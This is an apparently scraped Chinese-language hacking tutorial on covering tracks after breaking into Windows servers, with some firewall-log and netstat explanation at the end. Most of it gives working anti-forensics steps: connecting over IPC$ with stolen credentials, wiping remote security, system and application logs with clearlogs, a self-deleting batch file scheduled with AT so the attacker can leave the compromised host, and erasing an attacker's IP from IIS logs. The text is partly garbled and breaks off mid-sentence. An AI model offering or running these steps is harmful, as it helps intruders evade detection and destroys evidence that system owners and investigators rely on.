清理你入侵后的痕跡

第第頁(yè)清理你入侵后的痕跡清理你入侵后的痕跡

發(fā)表于：2023-06-23來(lái)源：：點(diǎn)擊數(shù)：標(biāo)簽：

DNS日志默認(rèn)位置：%systemroot%\system32\config，默認(rèn)文件大小512KB，管理員都會(huì)改變這個(gè)默認(rèn)大

DNS日志默認(rèn)位置：%systemroot%\system32\config，默認(rèn)文件大小512KB，管理員都會(huì)改變這個(gè)默認(rèn)大小。安全日志文件：%systemroot%\system32\config\SecEvent.EVT

系統(tǒng)日志文件：%systemroot%\system32\config\SysEvent.EVT

應(yīng)用程序日志文件：%systemroot%\system32\config\AppEvent.EVT

FTP日志默認(rèn)位置：%systemroot%\system32\logfiles\msftpsvc1\，默認(rèn)每天一個(gè)

WWW日志默認(rèn)位置：%systemroot%\system32\logfiles\w3svc1\，默認(rèn)每天一個(gè)日志

以上日志在注冊(cè)表里的鍵：應(yīng)用程序日志，安全日志，系統(tǒng)日志，DNS服務(wù)器日志，

它們這些LOG文件在注冊(cè)表中的：

HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog

鑰匙（表示成功）和鎖（表示當(dāng)用戶在做什么時(shí)被系統(tǒng)停止）。接連四個(gè)鎖圖標(biāo)，表示四次失敗審核，事件類型是帳戶登錄和登錄、注銷失敗

怎樣刪除這些日志：通過(guò)上面，得知日志文件通常有某項(xiàng)服務(wù)在后臺(tái)保護(hù)，除了系統(tǒng)日志、安全日志、應(yīng)用程序日志等等，它們的服務(wù)是Windos2000的關(guān)鍵進(jìn)程，而且與注冊(cè)表文件在一塊，當(dāng)Windows2000啟動(dòng)后，啟動(dòng)服務(wù)來(lái)保護(hù)這些文件，所以很難刪除.

下面就是很難的安全日志和系統(tǒng)日志了，守護(hù)這些日志的服務(wù)是EventLog，試著停掉它！D:\SERVER\system32\LogFiles\W3SVC1-app/-sec/-sys

-app=應(yīng)用程序日志

-sec=安全日志

-sys=系統(tǒng)日志

a.可以清除遠(yuǎn)程計(jì)算機(jī)的日志

**先用ipc連接上去:netuse\\ip\ipc$密碼/user:用戶名

**然后開始清除:方法

clearlogs\\ip-app這個(gè)是清除遠(yuǎn)程計(jì)算機(jī)的應(yīng)用程序日志

clearlogs\\ip-sec這個(gè)是清除遠(yuǎn)程計(jì)算機(jī)的安全日志

clearlogs\\ip-sys這個(gè)是清除遠(yuǎn)程計(jì)算機(jī)的系統(tǒng)日志

.清除本機(jī)日志:如果和遠(yuǎn)程計(jì)算機(jī)的不能空連接.那么就需要把這個(gè)工具傳到遠(yuǎn)程計(jì)算機(jī)上面

然后清除.方法:

clearlogs-app這個(gè)是清除遠(yuǎn)程計(jì)算機(jī)的應(yīng)用程序日志

clearlogs-sec這個(gè)是清除遠(yuǎn)程計(jì)算機(jī)的安全日志

clearlogs-sys這個(gè)是清除遠(yuǎn)程計(jì)算機(jī)的系統(tǒng)日志

安全日志已經(jīng)被清除.Suclearcase/"target="_blank">ccess:Theloghasbeencleared成功.

為了更安全一點(diǎn).同樣你也可以建立一個(gè)批處理文件.讓自動(dòng)清除.做好批處理文件.然后用at命令建立一個(gè)計(jì)劃任務(wù).讓自動(dòng)運(yùn)行.之后你就可以離開你的肉雞了.

例如建立一個(gè)c.bat

rem==============================開始

@echooff

clearlogs-app

clearlogs-sec

clearlogs-sys

delclearlogs.exe

delc.bat

exit

rem==============================結(jié)束

在你的計(jì)算機(jī)上面測(cè)試的時(shí)候可以不要@echooff可以顯示出來(lái).你可以看到結(jié)果

第一行表示:運(yùn)行時(shí)不顯示窗口

第二行表示:清除應(yīng)用程序日志

第三行表示:清除安全日志

第四行表示:清除系統(tǒng)日志

第五行表示:刪除clearlogs.exe這個(gè)工具

第六行表示:刪除c.bat這個(gè)批處理文件

第七行表示:退出

用AT命令.建立一個(gè)計(jì)劃任務(wù).這個(gè)命令在原來(lái)的教程里面和雜志里面都有.你可以去看看詳細(xì)的使用方法

AT時(shí)間c:\c.bat

之后你就可以安全離開了.這樣才更安全一點(diǎn).

2.清除iis日志:

工具:cleaniis.exe

使用方法:

iisantidote

iisantidotestop

topopitonwillstopiisbeforeclearingthefilesandrestartitafter

exemple:c:\winnt\system32\logfiles\w3svc1\dontforgetthe\

使用方法解釋:

cleaniis.exeiis日志存放的路徑清除參數(shù)

什么意思呢？？我來(lái)給大家舉個(gè)例子吧：

cleaniisc:\winnt\system32\logfiles\w3svc1\

這個(gè)表示清除log中所有此IP()地址的訪問(wèn)記錄.推薦使用這種方法

cleaniisc:\winnt\system32\logfiles\w3svc1\/shop/admin/

這個(gè)表示清除這個(gè)目錄里面的所以的日志

c:\winnt\system32\logfiles\w3svc1代表是iis日志的位置(windowsnt/2000)這個(gè)路徑可以改變

c:\windows\system32\logfiles\w3svc1代表是iis日志的位置(windowsxp/2023)這個(gè)路徑可以改變

這個(gè)測(cè)試表示在日志里面沒(méi)有這個(gè)ip地址.

我們看一下日志的路徑再來(lái)看一下

我們的ip()已經(jīng)沒(méi)有了.

已經(jīng)全部清空.

同樣這個(gè)也可以建立批處理.方法同上面的那個(gè).

===================================

3.清除歷史記錄及運(yùn)行的日志:

cleaner.exe

直接運(yùn)行就可以了.

===================================

4.察看blackice的日志.

這個(gè)地方我們可以清除的看到防火墻的日志.

這個(gè)表示有人發(fā)過(guò)來(lái)帶有病毒的email附件.ip是:16

tcp_probe_other表示通過(guò)tcp掃描或者利用別的和你建立連接通信

這個(gè)表示通過(guò)端口80掃描iis

病毒nimda

這里需要很多的計(jì)算機(jī)協(xié)議知識(shí).同時(shí)也需要對(duì)英語(yǔ)有了解

才能更好的分析如果對(duì)英語(yǔ)不好你可以裝一個(gè)金山詞霸.

一般情況下我們可以對(duì)一些可以不用管.

一般這三種情況不用去管.

最上面的critical這個(gè)可以去關(guān)注一下.一般是確實(shí)有別的計(jì)算機(jī)掃描或者入侵你的計(jì)算機(jī)

count代表次數(shù)intruder是對(duì)方的ipevent是通過(guò)什么方式(協(xié)議)掃描或者想入侵的

time表示時(shí)間

5.===================================

etstat-an表示什么意思?

使用這個(gè)命令可以察看到和本機(jī)的所有的連接.

ProtoLocalAddressForeignAddressState

協(xié)議本地端口及IP地址遠(yuǎn)程端口及IP地址狀態(tài)

LISTENING監(jiān)聽狀態(tài)表示等待對(duì)方連接

ESTABLISHED正在連接著.

TCP協(xié)議是TCP

UDP協(xié)議是UDP

TCP0:11154:80ESTABLISHED

這個(gè)表示利用tcp